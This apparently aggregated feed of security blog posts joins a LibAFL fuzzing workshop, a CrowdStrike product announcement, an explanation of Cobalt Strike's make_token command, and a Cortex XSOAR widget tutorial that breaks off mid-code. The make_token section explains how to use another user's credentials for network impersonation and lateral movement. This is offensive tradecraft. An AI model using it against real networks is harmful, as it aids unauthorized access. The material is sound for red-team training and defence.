Our harness can be very similar to the one we created for persistent mode fuzzing. We also have to watch out for the same kinds of global state or memory leaks that could make our fuzzing unstable. Again, we have a template for you if you want to craft the harness yourself.

./fuzz_target/target_libfuzzer_template.c

With LLVMFuzzerTestOneInput defined in our target, and a static library made, our fuzzer can directly call into the harness for each test case. We define a harness function which our executor will call with the test case data.

//...
        // our executor will be just a wrapper around a harness
        // that calls out the the libfuzzer style harness
        let mut harness = |input: &BytesInput| {
            let target = input.target_bytes();
            let buf = target.as_slice();
            // this is just some niceness to call the libfuzzer C function
            // but we don't need to use a libfuzzer harness to do inproc fuzzing
            // we can call whatever function we want in a harness, as long as it is linked
            libfuzzer_test_one_input(buf);
            return ExitKind::Ok;
        };

        let mut executor = InProcessExecutor::new(
            &mut harness,
            tuple_list!(edges_observer),
            &mut fuzzer,
            &mut state,
            &mut restarting_mgr,
        ).unwrap();

This easy interoperability with libfuzzer harnesses is nice, and again we see a huge speed improvement over our previous fuzzers.

[jordan inproc_fuzzer]$ ./target/release/inproc_fuzzer 

Starting up
[Stats       #1]  (GLOBAL) run time: 0h-0m-16s, clients: 2, corpus: 0, objectives: 0, executions: 0, exec/sec: 0.000
                  (CLIENT) corpus: 0, objectives: 0, executions: 0, exec/sec: 0.000, edges: 0/37494 (0%)
...
[Testcase    #1]  (GLOBAL) run time: 0h-0m-19s, clients: 2, corpus: 102, objectives: 5, executions: 106146, exec/sec: 30.79k
                  (CLIENT) corpus: 102, objectives: 5, executions: 106146, exec/sec: 30.79k, edges: 136/37494 (0%)
[Stats       #1]  (GLOBAL) run time: 0h-0m-19s, clients: 2, corpus: 102, objectives: 5, executions: 106146, exec/sec: 30.75k
                  (CLIENT) corpus: 102, objectives: 5, executions: 106146, exec/sec: 30.75k, edges: 137/37494 (0%)
[Testcase    #1]  (GLOBAL) run time: 0h-0m-19s, clients: 2, corpus: 103, objectives: 5, executions: 106626, exec/sec: 30.88k
                  (CLIENT) corpus: 103, objectives: 5, executions: 106626, exec/sec: 30.88k, edges: 137/37494 (0%)
[Objective   #1]  (GLOBAL) run time: 0h-0m-20s, clients: 2, corpus: 103, objectives: 6, executions: 106626, exec/sec: 28.32k
...

In this fuzzer we are also making use of a very important tool offered by LibAFL: the Low Level Message Passing (LLMP). This provides quick communication between multiple clients and lets us effectively scale our fuzzing to multiple cores or even multiple machines. The setup_restarting_mgr_std helper function creates an event manager that will manage the clients and restart them when they encounter crashes.

//...
        let monitor = MultiMonitor::new(|s| println!("{s}"));

        println!("Starting up");

        // we use a restarting manager which will restart
        // our process each time it crashes
        // this will set up a host manager, and we will have to start the other processes
        let (state, mut restarting_mgr) = setup_restarting_mgr_std(monitor, 1337, EventConfig::from_name("default"))
            .expect("Failed to setup the restarter!");

        // only clients will return from the above call
        println!("We are a client!");

This speed gain is important, and can make the difference between finding the juicy bug or not. Plus, it feels good to use all your cores and heat up your room a bit in the winter.

Emulation

Of course, not all targets are so easy to nicely link with or instrument with a compiler. In those cases, LibAFL provides a number of interesting tools like libafl_frida or libafl_nyx. In this next example we are going to use LibAFL's modified version of QEMU to give us code coverage feedback on a binary with no built in instrumentation. The modified version of QEMU will expose code coverage information to our fuzzer for feedback.

The setup will be similar to our in-process fuzzer, except now our harness will be in charge of running the emulator at the desired location in the target. By default the emulator state is not reset for you, and you will want to reset any global state changed between runs.

If you want to try it out for yourself, consult the Emulator documentation, and feel free to start with our template.

./qemu_fuzzer_template/

In our solution we first execute some initialization until a breakpoint, then save off the stack and return address. We will have to reset the stack each run, and put a breakpoint on the return address so that we can stop after our call. We also map an area in our target where we can place our input.

//...
        emu.set_breakpoint(mainptr);
        unsafe { emu.run() };

        let pc: GuestReg = emu.read_reg(Regs::Pc).unwrap();
        emu.remove_breakpoint(mainptr);

        // save the ret addr, so we can use it and stop
        let retaddr: GuestAddr = emu.read_return_address().unwrap();
        emu.set_breakpoint(retaddr);

        let savedsp: GuestAddr = emu.read_reg(Regs::Sp).unwrap();

        // now let's map an area in the target we will use for the input.
        let inputaddr = emu.map_private(0, 0x1000, MmapPerms::ReadWrite).unwrap();
        println!("Input page @ {inputaddr:#x}");

Now in the harness itself we will take the input and write it into the target, then start execution at the target function. This time we are executing the uid_to_name function directly, and using a mutator that will not add any invalid characters that valid_uid would have stopped.

//...
        let mut harness = |input: &BytesInput| {
            let target = input.target_bytes();
            let mut buf = target.as_slice();
            let mut len = buf.len();

            // limit out input size
            if len > 1024 {
                buf = &buf[0..1024];
                len = 1024;
            }

            // write our testcase into memory, null terminated
            unsafe {
                emu.write_mem(inputaddr, buf);
                emu.write_mem(inputaddr + (len as u64), b"\0\0\0\0");
            };
            // reset the registers as needed
            emu.write_reg(Regs::Pc, parseptr).unwrap();
            emu.write_reg(Regs::Sp, savedsp).unwrap();
            emu.write_return_address(retaddr).unwrap();
            emu.write_reg(Regs::Rdi, inputaddr).unwrap();

            // run until our breakpoint at the return address
            // or a crash
            unsafe { emu.run() };

            // if we didn't crash, we are okay
            ExitKind::Ok
        };

This emulation can be very quick, especially if we can get away without having to reset a lot of state each run. By targeting a deeper function here we are likely to reach crashes quickly.

...
[Stats #0] run time: 0h-0m-1s, clients: 1, corpus: 54, objectives: 0, executions: 33349, exec/sec: 31.56k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 55, objectives: 0, executions: 34717, exec/sec: 32.85k
[Stats #0] run time: 0h-0m-1s, clients: 1, corpus: 55, objectives: 0, executions: 34717, exec/sec: 31.59k
[Testcase #0] run time: 0h-0m-1s, clients: 1, corpus: 56, objectives: 0, executions: 36124, exec/sec: 32.87k
[2023-11-25T20:24:02Z ERROR libafl::executors::inprocess::unix_signal_handler] Crashed with SIGSEGV
[2023-11-25T20:24:02Z ERROR libafl::executors::inprocess::unix_signal_handler] Child crashed! 
[Objective #0] run time: 0h-0m-1s, clients: 1, corpus: 56, objectives: 1, executions: 36124, exec/sec: 28.73k
...

LibAFL also provides some useful helpers such as QemuAsanHelper and QemuSnapshotHelper. There is even support for full system emulation, as opposed to usermode emulation. Being able to use emulators effectively when fuzzing opens up a whole new world of targets.

Generation

Our method of starting with some initial inputs and simply mutating them can be very effective for certain targets, but less so for more complicated inputs. If we start with an input of some javascript like:

if (a < b) {
    somefunc(a);
}

Our existing mutations might result in the following:

if\x00 (a << b) {
    somefu(a;;;;
}

Which might find some bugs in parsers, but is unlikely to find deeper bugs in any javascript engine. If we want to exercise the engine itself, we will want to mostly produce valid javascript. This is a good use case for generation! By defining a grammar of what valid javascript looks like, we can generate lots of test cases to throw against the engine.

A block diagram of a basic generative fuzzer

As you can see in the diagram above, with just generation alone we are no longer using a mutation+feedback loop. There are lots of successful fuzzers that have gotten wins off generation alone (domato, boofuzz, a bunch of weird midi files), but we would like to have some form of feedback and progress in our fuzzing.

In order to make use of feedback in our generation, we can create an intermediate representation (IR) of our generated data. Then we can feed back the interesting cases into our inputs to be further mutated.

So our earlier javascript could be expressed as tokens like:

(if
    (cond_lt (var a), (var b)),
    (code_block
        (func_call some_func,
            (arg_list (var a))
        )
    )
)

Our mutations on this tokenized version can do things like replace tokens with other valid tokens or add more nodes to the tree, creating a slightly different input. We can then use these IR inputs and mutations as we did earlier with code coverage feedback.

A block diagram of a generative fuzzer with mutation feedback

Now mutations on the IR could produce something like so:

(if
    (cond_lt (const 0), (var b)),
    (code_block
        (func_call some_func
            (arg_list
                (func_call some_func,
                    (arg_list ((var a), (var a)))
                )
            )
        )
    )
)

Which would render to valid javascript, and can be further mutated upon if it produces interesting feedback.

if (0 < b) {
    somefunc(somefunc(a,a));
}

LibAFL provides some great tools for getting your own generational fuzzer with feedback going. A version of the Nautilus fuzzer is included in LibAFL. To use it with our example, we first define a grammar describing what a valid input to our target looks like.

./aflcc_custom_gen/grammar.json

With LibAFL we can load this grammar into a NautilusContext that we can use for generation. We use a InProcessExecutor and in our harness we take in a NautilusInput which we render to bytes and pass to our LLVMFuzzerTestOneInput.

./aflcc_custom_gen/src/main.rs

//...
    // our executor will be just a wrapper around a harness closure
    let mut harness = |input: &NautilusInput| {
        // we need to convert our input from a natilus tree
        // into actual bytes
        input.unparse(&genctx, &mut bytes);

        let s = std::str::from_utf8(&bytes).unwrap();
        println!("Trying:\n{:?}", s);

        let buf = bytes.as_mut_slice();

        libfuzzer_test_one_input(&buf);

        return ExitKind::Ok;
    };

We also need to generate a few initial IR inputs and specify what mutations to use.

//...
    if state.must_load_initial_inputs() {
        // instead of loading from an inital corpus, we will generate our initial corpus of 9 NautilusInputs
        let mut generator = NautilusGenerator::new(&genctx);
        state.generate_initial_inputs_forced(&mut fuzzer, &mut executor, &mut generator, &mut restarting_mgr, 9).unwrap();
        println!("Created initial inputs");
    }

    // we can't use normal byte mutations, so we use mutations that work on our generator trees
    let mutator = StdScheduledMutator::with_max_stack_pow(
        tuple_list!(
            NautilusRandomMutator::new(&genctx),
            NautilusRandomMutator::new(&genctx),
            NautilusRandomMutator::new(&genctx),
            NautilusRecursionMutator::new(&genctx),
            NautilusSpliceMutator::new(&genctx),
            NautilusSpliceMutator::new(&genctx),
        ),
        3,
    );

With this all in place, we can run and get the combined benefits of generation, code coverage, and in-process execution. To iterate on this, we can further improve our grammar as we better understand our target.

//...
                  (CLIENT) corpus: 145, objectives: 2, executions: 40968, exec/sec: 1.800k, edges: 167/37494 (0%)
[Testcase    #1]  (GLOBAL) run time: 0h-0m-26s, clients: 2, corpus: 146, objectives: 2, executions: 41229, exec/sec: 1.811k
                  (CLIENT) corpus: 146, objectives: 2, executions: 41229, exec/sec: 1.811k, edges: 167/37494 (0%)
[Objective   #1]  (GLOBAL) run time: 0h-0m-26s, clients: 2, corpus: 146, objectives: 3, executions: 41229, exec/sec: 1.780k
                  (CLIENT) corpus: 146, objectives: 3, executions: 41229, exec/sec: 1.780k, edges: 167/37494 (0%)
[Stats       #1]  (GLOBAL) run time: 0h-0m-27s, clients: 2, corpus: 146, objectives: 3, executions: 41229, exec/sec: 1.755k

Note that our saved solutions are just serialized NautilusInputs and will not work when used against our original target. We have created a separate project that will render these solutions out to bytes with our grammar.

./gen_solution_render/src/main.rs

//...
    let input: NautilusInput = NautilusInput::from_file(path).unwrap();
    let mut b = vec![];

    let tree_depth = 0x45;
    let genctx = NautilusContext::from_file(tree_depth, grammarpath);

    input.unparse(&genctx, &mut b);

    let s = std::str::from_utf8(&b).unwrap();
    println!("{s}");
[jordan gen_solution_render]$ ./target/release/gen_solution_render ../aflcc_custom_gen/solutions/id\:0

bar{{PLvkLizOcGccywcS}}foo

{{EGgkWs-PxeqpwBZK}}foo

bar{{hlNeoKiwMTNfqO_h}}

[jordan gen_solution_render]$ ./target/release/gen_solution_render ../aflcc_custom_gen/solutions/id\:0 | ../fuzz_target/target

Segmentation fault (core dumped)

Example Problem 2

This brings us to our second take home problem! We have a chat client that is vulnerable to a number of issues. Fuzzing this binary could be made easier though good use of generation and/or emulation. As you find some noisy bugs you may wish to either avoid those paths in your fuzzer, or patch the bugs in your target. Bugs can often mask other bugs. You can find the target here.

./chat_target/

As well as one example solution that can fuzz the chat client.

./chat_solution/src/main.rs

-- Ping from    16937944: D�DAAAATt'AAAAPt'%222�%%%%%%9999'pRR9&&&%%%%%2Tt�{�''pRt�'%99999999'pRR9&&&&&&999AATt'%&'pRt�'%TTTTTTTTTTTTTT9999999'a%''AAA��TTt�'% --
-- Error sending message: Bad file descriptor --
[Stats #0] run time: 0h-0m-5s, clients: 1, corpus: 531, objectives: 13, executions: 26752, exec/sec: 0.000
[Testcase #0] run time: 0h-0m-5s, clients: 1, corpus: 532, objectives: 13, executions: 26760, exec/sec: 0.000
-- Ping from    16937944: D�DAAAATT'%'aRt�'%9999'pRR����������T'%'LLLLLLLLLLLa%'nnnnnmnnnT'AA''��'A�'%'p%''A9999'pRR����������'pRR��R�� --
[2023-11-25T21:29:19Z ERROR libafl::executors::inprocess::unix_signal_handler] Crashed with SIGSEGV
[2023-11-25T21:29:19Z ERROR libafl::executors::inprocess::unix_signal_handler] Child crashed!

Conclusion

The goal of this workshop is to show the versatility of LibAFL and encourage its use. Hopefully these examples have sparked some ideas of how you can encorporate custom fuzzers against some of your targets. Let us know if you have any questions or spot any issues with our examples. Alternately, if you have an interesting target and want us to find bugs in it for you, please contact us.

Course Plug

Thanks again for reading! If you like this kind of stuff, you may be interested in our course "Practical Symbolic Execution for VR and RE" where you will learn to create your own symbolic execution harnesses for: reverse engineering, deobfuscation, vulnerability detection, exploit development, and more. The next public offering is in Febuary 2024 as part of ringzer0's BOOTSTRAP24. We are also available for private offerings on request.

More info here. https://ringzer0.training/trainings/practical-symbolic-execution.html

CrowdStrike Brings AI-Powered Cybersecurity to Small and Medium-Sized Businesses

15 November 2023 at 13:36

Cyber risks for small and medium-sized businesses (SMBs) have never been higher. SMBs face a barrage of attacks, including ransomware, malware and variations of phishing/vishing. This is one reason why the Cybersecurity and Infrastructure Security Agency (CISA) states “thousands of SMBs have been harmed by ransomware attacks, with small businesses three times more likely to be targeted by cybercriminals than larger companies.” 

In a desperate attempt to defend themselves, SMBs often turn to traditional antivirus (AV) software and even off-the-shelf consumer AV solutions. But these offerings simply can’t keep up with modern attacks. Referred to as “legacy AV,” these solutions are reactive and only able to defend against known malware or ransomware previously cataloged by the AV provider. This is too slow and reactive to stop modern adversaries. It only takes one attack to slip through legacy defenses to bring a business to a halt, or worse, result in a company-ending event.  

Legacy AV is also difficult to manage, especially with limited IT and security staff. The average deployment of these products is three months. In addition, they require quite a bit of tuning and manual configuration to be fully functional, adding to the operational burden of managing and updating legacy security tools.

Uncertain of which cybersecurity offering to buy and then deploy, many businesses throw up their hands in defeat. One poll shows 60% of SMBs use no cybersecurity measures at all. 

SMBs deserve cybersecurity that’s simple, affordable and effective. Today, we’re announcing a new release of CrowdStrike Falcon® Go to bring our industry-leading, AI-powered cybersecurity protection to SMBs in a package that’s never been easier to purchase, install or operate. 

SMBs Need Cybersecurity That Works

CrowdStrike knows how cybercriminals work and why they target SMBs. We also understand SMBs are often understaffed, resource-constrained and lack in-house security expertise. 

Falcon Go delivers award-winning cybersecurity to protect SMBs against ransomware, malware  and unknown threats. This simple yet powerful solution leverages modern technology, including machine learning, behavioral detection and AI, to deliver best-in-class protection against the cyber threats of today and tomorrow. With Falcon Go, small businesses can get the same enterprise-grade protection trusted by the world’s largest organizations and governments in a simple user experience designed for their needs.

SMBs no longer need to worry about staying ahead of evolving cyber threats. Powering Falcon Go is the world’s leading AI-native CrowdStrike Falcon® platform, which collects and analyzes trillions of endpoint events per week, giving SMBs the power of the crowd in a solution that even non-technical staff can use to keep their business safe. 

While other SMB cybersecurity solutions may offer simplicity, businesses need security that actually stops breaches. The Falcon platform scored 100% ransomware prevention in SE Labs testing, demonstrating that SMB cybersecurity can be both simple and effective.

Frictionless Purchasing and Installation in Seconds

CrowdStrike is making it easy for SMBs to purchase elite protection and quickly protect their company. Starting today, Falcon Go is available on Amazon Business, allowing SMBs to purchase industry-leading cybersecurity from the same website that millions of businesses use to purchase everyday business items.

Once purchased, users can instantly download and install Falcon Go to begin preventing threats with a guided setup wizard that recommends pre-configured protection levels. With Falcon Go, small businesses can immediately see which devices are protected and any threat activity, with guided and automated next steps to resolve security concerns. Falcon Go also makes it easy to expand protection to new devices, allowing the solution to support business growth. 

SMBs need simple, fast, modern cybersecurity to stop breaches at a price they can afford. With the release of Falcon Go, small businesses can get AI-powered, award-winning cybersecurity with easy purchasing, installation and operations to stop modern cyberattacks. 

To get started with a free trial of Falcon Go, visit the CrowdStrike website.

Additional Resources

Demystifying Cobalt Strike’s “make_token” Command

Introduction

If you are a pentester and enjoy tinkering with Windows, you have probably come across the following post by Raphael Mudge:

In this post, he explains how the Windows program runas works and how the netonly flag allows the creation of processes where the local identity differs from the network identity (the local identity remains the same, while the network identity is represented by the credentials used by runas).

Cobalt Strike provides the make_token command to achieve a similar result to runas /netonly.

If you are familiar with this command, you have likely experienced situations in which processes created by Beacon do not “inherit” the new token properly. The inner workings of this command are fairly obscure, and searching Google for something like “make_token cobalt strike” does not provide much valuable information (in fact, it is far more useful to analyse the implementations of other frameworks such as Sliver or Covenant).

Figure 2 - make_token documentation

In Raphael Mudge’s video Advanced Threat Tactics (6 of 9): Lateral Movement we can get more details about the command with statements like:

“If you are in a privileged context, you can use make_token in Beacon to create an access token with credentials”

“The problem with make_token, as much as steal_token, is it requires you to be in an administrator context before you can actually do anything with that token”

Even though the description does not mention it, Raphael states that make_token requires an administrative context. However, if we go ahead and use the command with a non-privileged user… it works! What are we missing here?

Figure 3 - make_token from an unprivileged session

This post aims to shed more light on how the make_token command works, as well as its capabilities and limitations. This information will be useful in situations where you want to impersonate other users through their credentials with the goal of enumerating or moving laterally to remote systems.

It’s important to note that, even though we are discussing Cobalt Strike, this knowledge is perfectly applicable to any modern C2 framework. In fact, for the purposes of this post, we took advantage of the fact that Meterpreter did not have a make_token module to implement it ourselves.

An example of the new post/windows/manage/make_token module can be seen below:

Figure 4 - Meterpreter make_token module

You can find more information about our implementation in the following links:

Windows Authentication Theory

Let’s begin with some theory about Windows authentication. This will help in understanding how make_token works under the hood and addressing the questions raised in the introduction.

Local Security Context Network Security Context?

Let’s consider a scenario where our user is capsule.corp\yamcha and we want to interact with a remote system to which only capsule.corp\bulma has access. In this example, we have Bulma’s password, but the account is affected by a deny logon policy in our current system.

If we attempt to run a cmd.exe process with runas using Bulma’s credentials, the result will be something like this:

Figure 5 - runas fails due to deny log on policy

The netonly flag is intended for these scenarios. With this flag we can create a process where we remain Yamcha at the local level, while we become Bulma at the network level, allowing us to interact with the remote system.

Figure 6 - runas netonly works

In this example, Yamcha and Vegeta were users from the same domain and we could circumvent the deny log on policy by using the netonly flag. This flag is also very handy for situations where you have credentials belonging to a local user from a remote system, or to a domain user from an untrusted domain.

The fundamental thing to understand here is Windows will not validate the credentials you specify to runas /netonly, it will just make sure they are used when the process interacts with the network. That’s why we can bypass deny log on policies with runas /netonly, and also use credentials belonging to users outside our current system or from untrusted domains.   

Now… How does runas manage to create a process where we are one identity in the local system, and another identity in the network?

If we extract the strings of the program, we will see the presence of CreateProcessWithLogonW.

$ strings runas.exe | grep -i createprocess
CreateProcessAsUserW
CreateProcessWithLogonW

A simple lookup of the function shows that runas is probably using it to create a new process with the credentials specified as arguments.

Figure 7 - CreateProcessWithLogonW

Reading the documentation, we will find a LOGON_NETCREDENTIALS_ONLY flag which allows the creation of processes in a similar way to what we saw with netonly. We can safely assume that this flag is the one used by runas when we specify /netonly.

Figure 8 - Netonly flag

The Win32 API provides another function very similar to CreateProcessWithLogonW, but without the process creation logic. This function is called LogonUserA.

Figure 9 - LogonUserA

LogonUserA is solely responsible for creating a new security context from given credentials. This is the function that make_token leverages and is commonly used along with the LOGON32_LOGON_NEW_CREDENTIALS logon type to create a netonly security context (we can see this in the implementations of open source C2 frameworks).

Figure 10 - Netonly flag

To understand how it is possible to create a process with two distinct “identities” (local/network), it is fundamental to become familiar with two important components of Windows authentication: logon sessions and access tokens.

Logon Sessions Access Tokens

When a user authenticates to a Windows system, a process similar to the image below occurs. At a high level, the user’s credentials are validated by the appropriate authentication package, typically Kerberos or NTLM. A new logon session is then created with a unique identifier, and the identifier along with information about the user is sent to the Local Security Authority (LSA) component. Finally, LSA uses this information to create an access token for the user.

Figure 11 - Windows authentication flow

Regarding access tokens, they are objects that represent the local security context of an account and are always associated with a process or thread of the system. These objects contain information about the user such as their security identifier, privileges, or the groups to which they belong. Windows performs access control decisions based on the information provided by access tokens and the rules configured in the discretionary access control list (DACL) of target objects.

An example is shown below where two processes – one from Attl4s and one from Wint3r – attempt to read the “passwords.txt” file. As can be seen, the Attl4s process is able to read the file due to the second rule (Attl4s is a member of Administrators), while the Wint3r process is denied access because of the first rule (Wint3r has identifier 1004).

Figure 12 - Windows access controls

Regarding logon sessions, their importance stems from the fact that if an authentication results in cached credentials, they will be associated with a logon session. The purpose of cached credentials is to enable Windows to provide a single sign-on (SSO) experience where the user does not need to re-enter their credentials when accessing a remote service, such as a shared folder on the network.

As an interesting note, when Mimikatz dumps credentials from Windows authentication packages (e.g., sekurlsa::logonpasswords), it iterates through all the logon sessions in the system to extract their information.

The following image illustrates the relationship between processes, tokens, logon sessions, and cached credentials:

Figure 13 - Relationship between processes, threads, tokens, logon sessions and cached credentials

The key takeaways are:

  • Access tokens represent the local security context of an authenticated user. The information in these objects is used by the local system to make access control decisions
  • Logon sessions with cached credentials represent the network security context of an authenticated user. These credentials are automatically and transparently used by Windows when the user wants to access remote services that support Windows authentication

What runas /netonly and make_token do under the hood is creating an access token similar to the one of the current user (Yamcha) along with a logon session containing the credentials of the alternate user (Bulma). This enables the dual identity behaviour where the local identity remains the same, while the network identity changes to that of the alternate user.

Figure 14 - Yamcha access token linked to logon session with Bulma credentials

As stated before, the fact that runas netonly or make_token do not validate credentials has many benefits. For example we can use credentials for users who have been denied local access, and also for accounts that the local system does not know and cannot validate (e.g. a local user from other computer or an account from an untrusted domain). Additionally, we can create “sacrificial” logon sessions with invalid credentials, which allows us to manipulate Kerberos tickets without overwriting the ones stored in the original logon session. 

However, this lack of validation can also result in unpleasant surprises, for example in the case of a company using an authenticated proxy. If we make a mistake when inserting credentials to make_token, or create sacrificial sessions carelessly, we can end up with locked accounts or losing our Beacon because it is no longer able to exit through the proxy!

Administrative Context or Not!?

Raphael mentioned that, in order to use a token created by make_token, an administrative context was needed.

“The problem with make_token, as much as steal_token, is it requires you to be in an administrator context before you can actually do anything with that token”

Do we really need an administrative context? The truth is there are situations where this statement is not entirely accurate.

As far as we know, the make_token command uses the LogonUserA function (along with the LOGON32_LOGON_NEW_CREDENTIALS flag) to create a new access token similar to that of the user, but linked to a new logon session containing the alternate user’s credentials. The command does not stop there though, as LogonUserA only returns a handle to the new token; we have to do something with that token!

Let’s suppose our goal is to create new processes with the context of the new token.

Creating Processes with a Token

If we review the Windows API, we will spot two functions that support a token handle as an argument to create a new process:

Reading the documentation of these functions, however, will show the following statements:

“Typically, the process that calls the CreateProcessAsUser function must have the SE_INCREASE_QUOTA_NAME privilege and may require the SE_ASSIGNPRIMARYTOKEN_NAME privilege if the token is not assignable.”

“The process that calls CreateProcessWithTokenW must have the SE_IMPERSONATE_NAME privilege.”

This is where Raphael’s statement makes sense. Even if we can create a token with a non-privileged user through LogonUserA, we will not be able to use that token to create new processes. To do so, Microsoft indicates we need administrative privileges such as SE_ASSIGNPRIMARYTOKEN_NAME, SE_INCREASE_QUOTA_NAME or SE_IMPERSONATE_NAME.

When using make_token in a non-privileged context and attempting to create a process (e.g., shell dir \dc01.capsule.corp\C$), Beacon will silently fail and fall back to ignoring the token to create the process. That’s one of the reasons why sometimes it appears that the impersonation is not working properly.

As a note, agents like Meterpreter do give more information about the failure:

Figure 15 - Impersonation failed

As such, we could rephrase Raphael’s statement as follows:

“The problem with make_token is it requires you to be in an administrator context before you can actually create processes with that token”

The perceptive reader may now wonder… What happens if I operate within my current process instead of creating new ones? Do I still need administrative privileges?

Access Tokens + Thread Impersonation

The Windows API provides functions like ImpersonateLoggedOnUser or SetThreadToken to allow a thread within a process to impersonate the security context provided by an access token.

Figure 16 - ImpersonateLoggedOnUser

In addition to keeping the token handle for future process creations, make_token also employs functions like these to acquire the token’s security context in the thread where Beacon is running. Do we need administrative privileges for this? Not at all.

As can be seen in the image below, we meet point number three:

Figure 17 - When is impersonation allowed in Windows

This means that any command or tool executed from the thread where Beacon is running will benefit from the security context created by make_token, without requiring an administrative context. This includes many of the native commands, as well as capabilities implemented as Beacon Object Files (BOFs).

Figure 18_01 - Beacon capabilities benefiting from the security context of the tokenFigure 18_02 - Beacon capabilities benefiting from the security context of the token

Closing Thoughts

Considering all the information above, we could do a more detailed description of make_token as follows:

The make_token command creates an access token similar to the one of the current user, along with a logon session containing the credentials specified as arguments. This enables a dual identity where nothing changes locally (we remain the same user), but in the network we will be represented by the credentials of the alternate user (note that make_token does not validate the credentials specified). Once the token is created, Beacon impersonates it to benefit from the new security context when running inline capabilities.

The token handle is also stored by Beacon to be used in new process creations, which requires an administrative context. If a process creation is attempted with an unprivileged user, Beacon will ignore the token and fall back to a regular process creation.

As a final note, we would like to point out that in 2019 Raphael Mudge released a new version of his awesome Red Team Ops with Cobalt Strike course. In the eighth video, make_token was once again discussed, but this time showing a demo with an unprivileged user. While this demonstrated that running the command did not require an administrative context, it did not explain much more about it.

We hope this article has answered any questions you may have had about make_token.

Sources

Nordstream Pipelines Attacks

23 March 2023 at 17:51

Russia – Ukraine Conflict and Its Impact on the Cyber Threat Landscape Bottom Line Up Front (BLUF)    Russia’s attempt to annex parts of Ukraine created a broader contention between nations and drew western nations into the conflict. The sabotage of the Russian Nordstream 1 & 2 pipelines may be an act of further escalation and …

Continue reading "Nordstream Pipelines Attacks"

The post Nordstream Pipelines Attacks appeared first on VerSprite.

Cortex XSOAR Tips & Tricks – Leveraging dynamic sections – number widgets

28 February 2023 at 08:00
Cortex XSOAR TipsTricks – Leveraging dynamic sections

Introduction

Cortex XSOAR is a security oriented automation platform, and one of the areas where it stands out is customization.

A recurring problem in a SOC is data visualization, analysts can be swarmed with information, and finding out what piece of data is currently both relevant and significant can become hard. One of our tasks as SOAR engineers is to ease the decision process for analysts, we do so by providing additional contextual information about the incidents they handle, directly within the incident layout. In this objective, we incorporate number widgets into the analyst interface, these allow us to tell more visual stories about the security incidents we manage in XSOAR. From raw and sometimes unorganized data, they let us bring up eye-catching depictions of elements that can help in assessing the impact and veracity of a detection.

Objectives

In this blogpost, we will focus on the use of number widgets.

We will show you how to make use of them for outputting information to the war room, incidents, indicators and dasbhoards. On top of that we will also cover how to add trends information and even how to integrate them into a dashboard with a dynamic query. In the previous post in the series, we looked at dynamic sections in Cortex XSOAR and how to leverage them to display text in a tree like way. If you are not familiar with Cortex XSOAR and dynamic sections, please read the previous post in the series.

We previously saw that we could use dynamic dections to display text, but there are a few other options available to us. These options are broken down here. In this post, we will:

  • Start with a simple example that runs a static query against Microsoft Sentinel and lets us display a single number widget.
  • Continue with extracting a second number from our query to populate the trend of the number we display.
  • Bring our widget to a dashboard
  • Make our dashboard widget read the date range selected by the user and modify the Sentinel query accordingly.

Let’s begin with a new automation and follow the instructions available in the number widget example of the PaloAlto documentation. When we run their example, we get the following result:

Figure 1: War Room output of the code example available in the Cortext XSOAR documentation

As expected, the example works out of the box. Let’s now go and make the widget display data from Microsoft Sentinel.

A static number from sentinel

To display data pulled from Microsoft Sentinel (Microsoft Azure’s cloud native SIEM), we first need to call an integration command. Here we use an instance of the Azure Log Analytics integration available in the Cortex XSOAR marketplace:

res = demisto.executeCommand(
	"azure-log-analytics-execute-query", {
		"query": THE_QUERY
	}
)

We need a query to run, we will develop it on Sentinel before using it from Cortex XSOAR.

We will be looking at entries in SecurityIncident, a table that holds information about the security incidents present in your Sentinel deployment. We will query that table, and count the number of distinct incidents in a given month. The query we will use for that is the following:

SecurityIncident
| where TimeGenerated between (
    datetime("2022-10-01T00:00:00+00:00")
    ..
    datetime("2022-11-01T00:00:00+00:00"))
| summarize count()
Figure 2: Screenshot of a Microsoft Sentinel query and it’s results: single value

Now that we know our query works, we will port it to Cortex XSOAR. We start by duplicating our previous automation and adding code to call the integration with the Sentinel query.

res = demisto.executeCommand("azure-log-analytics-execute-query", {
"query": """SecurityIncident
| where TimeGenerated between(
	datetime("2022-10-01T00:00:00+00:00")
	..
	datetime("2022-11-01T00:00:00+00:00"))
| summarize count()"""
})

We need to extract the count_ we could observe in the results of Sentinel, let’s inspect the res object returned to us by the integration.

Figure 3: Debug view in PyCharm

Upon inspection of the returned object, we identify that we can use the following logic to extract the count of incidents

counts = []

for result in results:
    if not (
        isinstance(result, dict)
        and
        isinstance(contents := result.get("Contents"), list)
    ):
        continue
    for content in contents:
        if (
            isinstance(content, dict)
            and
            isinstance(count := content.get("count_"), int)
        ):
            counts.append(count)

total_count = sum(counts)

With the total_count obtained, we can simply change the hardcoded number from our previous widget and replace it with the value we just fetched:

demisto.results(
    {
        "Type": 17,
        "ContentsFormat": "number",
        "Contents": {
            "stats": total_count,
            "params": {
                "name": "Incidents Last Month",
                "colors": {
                    "items": {
                        "green": {
                            "value": 40
                        }
                    }
                }
            }
        }
    }
)

In the snippet above we use demisto.results(), this function let’s us write to the standard output that will be read by Cortex XSOAR. More possibilities for returning data from an automation are available in this documentation page: Python code conventions, returning data. Here we use the type 17 in the data we return, this is the type associated to widgets, the list of all defined types is available here.

Upon running our new automation, we get the exact same number previously obtained through Sentinel:

Figure 4: War room view of the widget outputted by the “Single value from Sentinel” code snippet

Adding a trend

We already have the number of alerts from last month pulled into XSOAR and displayed as a widget, let’s continue and also pull the count for the previous month. Our query to Sentinel now becomes:

SecurityIncident
| where TimeGenerated between (
    datetime("2022-10-01T00:00:00+00:00")..
    datetime("2022-11-01T00:00:00+00:00"))
| extend same = 1
| union (
    SecurityIncident
    | where TimeGenerated between (
        datetime("2022-09-01T00:00:00+00:00")..
        datetime("2022-10-01T00:00:00+00:00"))
    | extend same = 2)
| summarize count() by same
Figure 5: Screenshot of a Microsoft Sentinel query and it’s results: two values

Correspondingly, our querying and extracting code becomes:

this_month_counts = list()
last_month_counts = list()

lookup = {
    1: this_month_counts,
    2: last_month_counts
}

for result in results:
    if not (
        isinstance(result, dict)
        and
        isinstance(contents := result.get("Contents"), list)
    ):
        continue
    for content in contents:
        if not isinstance(content, dict):
            continue
        if not isinstance(raw_same_target := content.get("same"), int):
            continue
        same_target = lookup.get(raw_same_target)
        if (
            same_target is not None
            and
            isinstance(count := content.get("count_"), int)
        ):
            same_target.append(count)

total_this_month_counts = sum(this_month_counts)
total_last_month_counts = sum(last_month_counts)

As for the data returned to Cortex XSOAR, the only change is on the stats key which now becomes:

"stats": {
